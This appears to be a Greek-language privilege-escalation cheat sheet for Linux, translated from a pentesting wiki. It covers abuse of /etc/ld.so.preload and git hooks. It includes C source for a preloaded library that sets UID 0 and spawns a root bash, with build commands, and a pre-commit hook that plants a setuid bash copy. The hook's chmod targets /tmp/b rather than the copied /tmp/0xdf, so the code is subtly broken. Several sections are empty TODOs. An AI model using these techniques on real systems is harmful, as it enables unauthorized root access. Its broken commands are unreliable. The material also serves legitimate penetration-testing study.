/etc/ld.so.preload

Αυτό το αρχείο συμπεριφέρεται όπως η μεταβλητή περιβάλλοντος LD_PRELOAD αλλά λειτουργεί επίσης σε SUID δυαδικά. Αν μπορείτε να το δημιουργήσετε ή να το τροποποιήσετε, μπορείτε απλά να προσθέσετε ένα μονοπάτι προς μια βιβλιοθήκη που θα φορτωθεί με κάθε εκτελούμενο δυαδικό.

Για παράδειγμα: echo "/tmp/pe.so" > /etc/ld.so.preload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Git hooks

Οι Git hooks είναι σενάρια που εκτελούνται σε διάφορα συμβάντα σε ένα αποθετήριο git όπως όταν δημιουργείται ένα commit, μια συγχώνευση... Έτσι, αν ένα προνομιούχο σενάριο ή χρήστης εκτελεί αυτές τις ενέργειες συχνά και είναι δυνατόν να γράψει στον φάκελο .git, αυτό μπορεί να χρησιμοποιηθεί για ανύψωση προνομίων.

Για παράδειγμα, είναι δυνατόν να δημιουργηθεί ένα σενάριο σε ένα αποθετήριο git στο .git/hooks ώστε να εκτελείται πάντα όταν δημιουργείται ένα νέο commit:

```bash echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit chmod +x pre-commit ``` ### Αρχεία Cron & Time

TODO

Αρχεία Υπηρεσιών & Σοκέ

TODO

binfmt_misc

Το αρχείο που βρίσκεται στο /proc/sys/fs/binfmt_misc υποδεικνύει ποιο δυαδικό αρχείο πρέπει να εκτελέσει ποιον τύπο αρχείων. TODO: ελέγξτε τις απαιτήσεις για να εκμεταλλευτείτε αυτό για να εκτελέσετε ένα αντίστροφο κέλυφος όταν ανοίγεται ένα κοινό τύπο αρχείου.